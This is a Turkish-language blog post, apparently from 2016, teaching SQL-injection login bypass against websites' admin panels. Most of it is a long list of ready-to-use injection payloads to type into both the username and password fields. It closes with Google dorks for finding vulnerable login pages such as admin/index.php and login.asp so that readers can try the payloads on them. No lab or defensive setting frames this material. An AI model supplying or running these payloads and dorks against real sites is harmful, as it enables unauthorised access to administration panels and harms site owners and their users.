erdinckaya
.org
today : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

Login bypass k4y4 rwxr-xr-x 0 Haziran 02, 2016

Filename Login bypass
Permission rw-r--r--
Author k4y4
Date and Time Haziran 02, 2016
Label
Action
Merhabalar konumuz login bypass. Öncelikle login bypass bir sql çeşidir.

Login bypass hedef sitenin /admin paneline yetkili olarak giriş yapmamızı sağlıyor.

örnek resimde gördüğümüz gibi sitenin paneli neyse örnek /admin /panel /setup /yonetici /administrator /yonetim vs. sık kullanılan admin panelleridir.

admin ve şifreye ;

Aşağıdaki kodlardan herhangi birini deniyerek giriş yapmayı deneyebiliriz. Bu kodlar çoğaltılabilir.

kullanıcı adı ve şifeye aynı kodu yazıyoruz arkadaşlar
kullanıcı acına ' or ''=' yazdıysak şifreyede aynısını yazıyoruz.

'1'='1
admin' or '1'='1
' or ''='
'=' 'or'
'or'1'='1 (güncel)
'OR''='
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*


' or true--
') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
'+'
'&'
'^'
'*'
' or ''-'
' or ''+'
' or ''&'
' or ''^'
' or ''*'
"-"
"+"
"&"
"^"
"*"
" or ""-"
" or ""+"
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

Denemeniz için bazı dorklar;

inurl:administrator.asp
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:login.php
inurl:login.asp
inurl:login.aspx

0 yorum:

Yorum Gönder

 

Erdinckaya © 2017 Erdinç Kaya | Siber Güvenlik Blog
Template design by k4y4